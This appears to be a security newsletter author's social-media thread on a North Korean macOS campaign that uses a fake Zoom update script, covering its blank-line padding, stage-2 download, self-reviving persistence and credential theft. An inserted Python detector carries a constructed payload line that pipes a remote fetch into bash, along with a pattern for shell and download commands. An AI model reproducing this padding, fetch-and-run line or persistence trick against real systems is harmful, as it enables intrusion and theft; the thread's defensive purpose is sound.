🚨 New macOS backdoor alert: North-Korean hackers are disguising a Zoom update that drops malware built to hijack laptops and steal data & passwords.
If you or your devs run macOS, keep scrolling.👇
The attacker pretends to be a trusted contact → DM on Telegram → Calendly invite → follow-up email with a Zoom link that tells victims to “run this update script.”
It's been highly successful, catching founders and devs off guard.
That script (`zoom_sdk_support.scpt`) pads itself with *10,000 blank lines*: you scroll forever and never see the payload.
The last 3 lines fetch stage-2 from `support.us05web-zoom[.]forum` (notice the look-alike Zoom domain).
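As an added triage example (not from the thread or from SentinelOne's report), this Python helper flags a plain-text script whose payload sits after a long run of blank lines, the trick described above; the sample script, the look-alike URL and the threshold are constructed.

```python
"""Triage helper for 'update scripts' padded with thousands of blank lines.

Added example. Assumes the script is plain-text AppleScript and flags a long
blank run followed by lines that shell out or fetch a URL.
"""
import re
from typing import List, NamedTuple

# Constructed sample: two harmless-looking lines, a 10,000-line blank run,
# then the payload a reader scrolling the file would never reach.
SAMPLE_SCRIPT = (
    "-- Zoom SDK support script\n"
    'display dialog "Updating Zoom SDK..."\n'
    + "\n" * 10_000
    + 'set u to "https://support.example-lookalike.invalid/update"\n'
    'do shell script "curl -s " & u & " | bash"\n'
    "return\n"
)

# Constructs that legitimately belong in an updater, not buried after padding.
SUSPICIOUS = re.compile(r"do shell script|curl|wget|osascript|https?://", re.I)


class Finding(NamedTuple):
    longest_blank_run: int
    payload_lines: List[str]
    suspicious: bool


def find_padded_payload(text: str, min_blank_run: int = 1000) -> Finding:
    """Return the longest blank run and the non-blank code that follows it.

    `suspicious` is True when the run is at least `min_blank_run` lines and
    the trailing code shells out or references a URL.
    """
    lines = text.splitlines()
    best_len, best_end, run = 0, -1, 0
    for i, line in enumerate(lines):
        if line.strip() == "":
            run += 1
            if run > best_len:
                best_len, best_end = run, i
        else:
            run = 0
    payload = [l for l in lines[best_end + 1:] if l.strip()] if best_end >= 0 else []
    suspicious = best_len >= min_blank_run and any(SUSPICIOUS.search(l) for l in payload)
    return Finding(best_len, payload, suspicious)


if __name__ == "__main__":
    f = find_padded_payload(SAMPLE_SCRIPT)
    print(f"blank run: {f.longest_blank_run}, payload: {len(f.payload_lines)} lines, suspicious: {f.suspicious}")
```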
Stage-2 drops two binaries in `/private/var/tmp`:
• `a` (C++) - kicks off the data-stealing chain
• `installer` (Nim) - sets up persistence via signal handlers so killing the process re-installs the backdoor on reboot.
Nasty little persistence trick - the malware revives itself when killed.
It intercepts `SIGINT` / `SIGTERM`, then rewrites its LaunchAgents on shutdown.
"any user-initiated termination of the malware results in the deployment of the core components, making the code resilient to basic defensive actions."
The data exfiltration:
Keychain creds, browser data, Telegram chats, then pushed over WebSockets - an encrypted channel that's tricky for network sensors that ignore non-HTTP(S) traffic.
macOS isn't safe just because of Gatekeeper:
social engineering + obscure languages (Nim) = new blind spots.
Patch, monitor WebSocket egress, & warn employees: *no legit Zoom update arrives as an AppleScript!*
RT to keep teams safe.
If you like staying on top of this kind of news:
Join over 30,000 cybersecurity pros who get my free weekly newsletter - https://vulnu.com/subscribe